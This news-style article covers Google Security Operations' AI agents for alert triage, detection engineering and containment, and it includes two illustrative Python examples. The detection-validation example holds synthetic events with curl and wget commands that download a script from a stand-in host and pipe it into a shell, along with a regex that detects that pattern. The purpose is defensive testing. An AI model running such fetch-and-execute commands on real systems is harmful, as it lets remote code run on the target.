Google Cloud says its Triage and Investigation agent in Google Security Operations has investigated more than 5 million alerts, reducing a typical 30-minute manual analysis to 60 seconds with Gemini.
The figure, disclosed in a June 10 Google Cloud post, gives a production-scale number to an enterprise use case for agentic AI: moving alert review, evidence gathering and incident explanation into the normal security operations workflow.
The agent is now generally available. Google said it autonomously investigates alerts, gathers evidence, provides verdicts with explanations and supports alert closure and remediation flows.
Google’s product language keeps analysts in control of “critical, high-impact actions,” while allowing AI to support decision-making and remediation workflows.
Extending the threat defense framework
The release extends Google AI Threat Defense, which Google Cloud introduced on May 28 as an automated security system built around four steps: prepare, scan and prioritize, remediate and monitor. The June update sits in the monitor layer, where Google Security Operations agents are being used for detection engineering, triage, containment and threat hunting.
Combating an accelerated attack cycle
Google frames the rollout as a response to a faster attack cycle. Mandiant’s M-Trends 2026 report, based on more than 500,000 hours of frontline incident investigations in 2025, found exploits remained the most common initial infection vector for the sixth consecutive year, accounting for 32% of intrusions. Mandiant also said the median time between an initial access event and hand-off to a secondary threat group fell from more than eight hours in 2022 to 22 seconds in 2025.
The same report found the mean time to exploit vulnerabilities dropped to an estimated -7 days, meaning exploitation was routinely occurring before a patch was released. Mandiant placed that acceleration in the context of zero-day use, edge and core network devices, and infrastructure that often lacks standard endpoint detection and response telemetry.
Verizon’s 2026 Data Breach Investigations Report points in the same direction. Verizon said 31% of breaches now start with software vulnerabilities, ahead of stolen passwords, and 15 attack techniques are being bolstered by generative AI. The report describes attackers using AI to work faster across stages from spotting gaps to writing malware.
Connecting detection and investigation agents
Google’s SOC agent rollout is built around several linked functions. The Detection Engineering agent, now in preview, can translate exploitation patterns into custom detections for a customer’s environment.
Google said the agent uses sources including Google Threat Intelligence, Mandiant-curated attack patterns, offensive tool repositories, red and purple team reports, open-source detection repositories and internal telemetry. It can also validate rules with synthetic events before an exploit reaches the environment.
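The step that matters most in that description is the last one: a rule is only worth deploying once it has been run against synthetic events that include both the exploitation pattern and the benign activity most likely to resemble it. The following is an added example written for this article, not Google's code and not the rule language the product uses; the rule format, the event schema and the synthetic events are constructed for illustration. It scores a broad rule and a tightened rule against the same labelled synthetic events so the false positive shows up before anything reaches production.

```python
"""Validate candidate detection rules against labelled synthetic events.

Added example (not Google's code). Rule format, event fields and the
synthetic events below are assumptions constructed for illustration.
"""
import re
from dataclasses import dataclass

# Constructed synthetic process events: two true positives (a web server
# spawning a shell that pipes a downloaded script into an interpreter) and
# two benign look-alikes that a sloppy rule would also flag.
SYNTHETIC_EVENTS = [
    {"host": "web-01", "parent": "/usr/sbin/httpd", "process": "/bin/sh",
     "cmdline": "sh -c 'curl http://203.0.113.7/x.sh | sh'"},
    {"host": "bastion-01", "parent": "/usr/sbin/sshd", "process": "/bin/bash",
     "cmdline": "bash -l"},
    {"host": "web-02", "parent": "/usr/sbin/httpd", "process": "/bin/sh",
     "cmdline": "sh -c '/opt/app/rotate_logs.sh'"},
    {"host": "web-03", "parent": "/usr/sbin/httpd", "process": "/bin/bash",
     "cmdline": "bash -c 'wget -qO- http://203.0.113.7/x.sh | bash'"},
]
# Labels: which synthetic hosts the rule is expected to fire on.
EXPECTED_HITS = {"web-01", "web-03"}


@dataclass(frozen=True)
class Rule:
    """A minimal process-creation rule: both regexes must match."""
    name: str
    parent_re: str
    cmdline_re: str

    def matches(self, event: dict) -> bool:
        return (re.search(self.parent_re, event["parent"]) is not None
                and re.search(self.cmdline_re, event["cmdline"]) is not None)


def validate_rule(rule: Rule, events: list, expected_hits: set) -> dict:
    """Run the rule over labelled events and report precision, recall and
    the hosts it got wrong, so a noisy rule is rejected before deployment."""
    fired = {e["host"] for e in events if rule.matches(e)}
    tp, fp, fn = fired & expected_hits, fired - expected_hits, expected_hits - fired
    precision = len(tp) / len(fired) if fired else 0.0
    recall = len(tp) / len(expected_hits) if expected_hits else 1.0
    return {"rule": rule.name, "precision": precision, "recall": recall,
            "false_positives": sorted(fp), "missed": sorted(fn)}


# First draft: any shell spawned by httpd. Catches the attack, but also the
# benign log-rotation helper on web-02.
BROAD_RULE = Rule("httpd_spawns_shell", r"httpd$", r".")
# Tightened: httpd-spawned shell whose command line pipes curl/wget output
# into an interpreter, which is the actual exploitation pattern.
TIGHT_RULE = Rule("httpd_shell_pipes_download", r"httpd$",
                  r"\b(curl|wget)\b[^|]*\|\s*(sh|bash)\b")


def compare_rules() -> dict:
    """Score both candidate rules against the same synthetic corpus."""
    return {r.name: validate_rule(r, SYNTHETIC_EVENTS, EXPECTED_HITS)
            for r in (BROAD_RULE, TIGHT_RULE)}


if __name__ == "__main__":
    for name, result in compare_rules().items():
        print(name, result)
```

The broad rule reaches full recall but flags web-02, a precision of two thirds on a corpus of four events; the tightened rule fires only on the two labelled hosts. The same harness is reused every time the rule or the synthetic corpus changes, which is what turns "validate with synthetic events" from a one-off check into a regression test for the detection.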
The generally available Triage and Investigation agent then works across endpoints, on-premises firewalls, identity, network data, cloud telemetry and custom application logs. Google said the agent uses those signals to build an attack narrative from separate alerts, a function aimed at reducing alert-by-alert investigation time when attackers move across several systems.
Automating containment and threat hunting
Google is also previewing agentic containment and response. The response model pairs AI agents, which gather evidence and reason through alerts, with deterministic playbooks, which keep high-impact actions under analyst control.
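Two of the claims above, stitching separate alerts into one attack narrative and keeping high-impact response actions behind a deterministic playbook, are easier to reason about with a concrete implementation. The following is an added example written for this article, not Google's code and not a description of how its agents are built; the alert schema, the 30-minute correlation window, the escalation rule and the playbook table are all assumptions constructed for illustration. It links alerts from identity, endpoint, firewall and cloud sources that share a user or host within the window, escalates a chain that spans several sources, and then emits a response plan in which each action carries a fixed, policy-defined flag saying whether an analyst must approve it.

```python
"""Correlate cross-source alerts into attack narratives and gate response
actions through a deterministic playbook.

Added example (not Google's code). Alert fields, the correlation window,
the escalation rule and the playbook table are illustrative assumptions.
"""
from datetime import datetime, timedelta

# Constructed alerts from four separate sources. The first four describe one
# intrusion seen from different angles; the last is unrelated noise.
ALERTS = [
    {"ts": "2026-06-10T09:02:11Z", "source": "identity", "severity": "low",
     "user": "jdoe", "host": None, "title": "Impossible-travel sign-in"},
    {"ts": "2026-06-10T09:05:40Z", "source": "endpoint", "severity": "medium",
     "user": "jdoe", "host": "lt-4471", "title": "Credential dumping tool executed"},
    {"ts": "2026-06-10T09:07:02Z", "source": "firewall", "severity": "low",
     "user": None, "host": "lt-4471", "title": "SMB from workstation to file server"},
    {"ts": "2026-06-10T09:09:15Z", "source": "cloud", "severity": "medium",
     "user": "jdoe", "host": None, "title": "New access key created for service account"},
    {"ts": "2026-06-10T11:30:00Z", "source": "endpoint", "severity": "low",
     "user": "asmith", "host": "lt-9920", "title": "Unsigned binary executed"},
]
SEVERITY = {"low": 1, "medium": 2, "high": 3, "critical": 4}
WINDOW = timedelta(minutes=30)  # assumed correlation window

# Deterministic playbook: action -> whether an analyst must approve it.
# The agent may propose any of these; policy, not the model, decides which
# run unattended.
PLAYBOOK = {
    "add_indicators_to_watchlist": False,
    "isolate_host": True,
    "disable_user": True,
    "revoke_cloud_access_key": True,
}


def _ts(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")


def correlate(alerts: list, window: timedelta = WINDOW) -> list:
    """Union alerts that share a user or host within `window` into chains,
    each chain kept in time order."""
    alerts = sorted(alerts, key=lambda a: _ts(a["ts"]))
    parent = list(range(len(alerts)))

    def find(i):
        while parent[i] != i:
            parent[i] = parent[parent[i]]
            i = parent[i]
        return i

    for i, a in enumerate(alerts):
        for j in range(i + 1, len(alerts)):
            b = alerts[j]
            if _ts(b["ts"]) - _ts(a["ts"]) > window:
                break  # sorted, so nothing later is inside the window either
            if (a["user"] and a["user"] == b["user"]) or (a["host"] and a["host"] == b["host"]):
                parent[find(i)] = find(j)
    chains = {}
    for i, a in enumerate(alerts):
        chains.setdefault(find(i), []).append(a)
    return list(chains.values())


def build_narrative(chain: list) -> dict:
    """Summarise one chain: entities, sources, escalated severity, timeline."""
    sources = sorted({a["source"] for a in chain})
    top = max(SEVERITY[a["severity"]] for a in chain)
    # Assumed escalation rule: independent low/medium signals from three or
    # more sources on the same entities are treated as one high finding.
    if len(sources) >= 3:
        top = max(top, SEVERITY["high"])
    return {"severity": next(k for k, v in SEVERITY.items() if v == top),
            "sources": sources,
            "users": sorted({a["user"] for a in chain if a["user"]}),
            "hosts": sorted({a["host"] for a in chain if a["host"]}),
            "timeline": [f'{a["ts"]} [{a["source"]}] {a["title"]}' for a in chain]}


def plan_response(narrative: dict) -> list:
    """Propose actions; each carries the playbook's approval flag unchanged."""
    high = SEVERITY[narrative["severity"]] >= SEVERITY["high"]
    actions = ["add_indicators_to_watchlist"]
    if high and narrative["hosts"]:
        actions.append("isolate_host")
    if high and narrative["users"]:
        actions.append("disable_user")
    if high and "cloud" in narrative["sources"]:
        actions.append("revoke_cloud_access_key")
    return [{"action": a, "requires_approval": PLAYBOOK[a]} for a in actions]


def investigate(alerts: list) -> list:
    """Full pass: correlate, narrate, plan; highest severity first."""
    results = []
    for chain in correlate(alerts):
        narrative = build_narrative(chain)
        narrative["response"] = plan_response(narrative)
        results.append(narrative)
    results.sort(key=lambda n: -SEVERITY[n["severity"]])
    return results


if __name__ == "__main__":
    for n in investigate(ALERTS):
        print(n["severity"], n["users"], n["hosts"], n["sources"])
        for step in n["response"]:
            print("  ", step)
```

On the constructed input the four jdoe/lt-4471 alerts, none above medium on its own, collapse into one high-severity narrative spanning four sources, and every containment step it proposes except the watchlist update is flagged for analyst approval; the unrelated asmith alert stays a separate low-severity item with no containment proposed. The point of the split is that the correlation and escalation logic can be as heuristic as you like, while the list of actions that run without a human is a short table that can be reviewed and tested on its own.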
A separate Threat Hunting agent, also in preview, searches historical logs and enterprise telemetry for stealthy activity and novel attack patterns.
The agents now sit across detection creation, alert investigation, response automation and retroactive hunting, the same sequence security teams use to move from signal to containment.
Addressing boundaries and missing metrics
The boundaries remain important. Google has disclosed the alert volume handled by the Triage and Investigation agent and the claimed reduction in analysis time, but its post does not provide false-positive rates, customer-by-customer performance ranges or detailed criteria for when containment steps require human approval.